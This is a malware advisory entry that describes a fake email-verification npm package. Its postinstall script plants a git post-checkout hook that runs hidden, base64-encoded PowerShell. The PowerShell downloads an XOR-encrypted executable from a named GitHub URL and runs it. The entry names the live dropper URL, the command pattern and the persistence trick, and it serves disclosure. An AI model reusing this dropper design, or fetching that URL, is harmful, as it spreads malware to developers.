MAL-2026-5750

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (fbadb3bfdda7f6b7d425f83f9d5007a59d92c19c75fee43181a471a5627fac7f) The package advertises itself as an email confirmation/verification utility, but the shipped code contains no such functionality — index.js exports only a single getThemeColor function returning a color string. The real behavior is in install-hook.js, executed via the postinstall lifecycle script. It writes a.git/hooks/post-checkout hook into the installer's local repository whose contents are `powershell -NoP -NonI -W Hidden -Enc <base64>`. The base64 blob decodes to UTF-16LE PowerShell that downloads https://github.com/Dimitrijenco/Sticky_note/releases/download/v2/launcher.bin, XOR-decrypts the response with key 0x42, writes the result to %TEMP%\tmp.exe, executes it hidden via Start-Process -WindowStyle Hidden, sleeps, and deletes it. The dropper URL is hosted on an unrelated third-party GitHub account whose repository name (Sticky_note) is unrelated to the package's stated purpose. Two layers of obfuscation (base64-encoded UTF-16LE PowerShell + XOR-encrypted payload) are used to hide both the destination and the executed bytes. The persistence mechanism — a git post-checkout hook — re-triggers the download-and-execute path on every future `git checkout` in any repository where the package was installed, surviving package uninstall.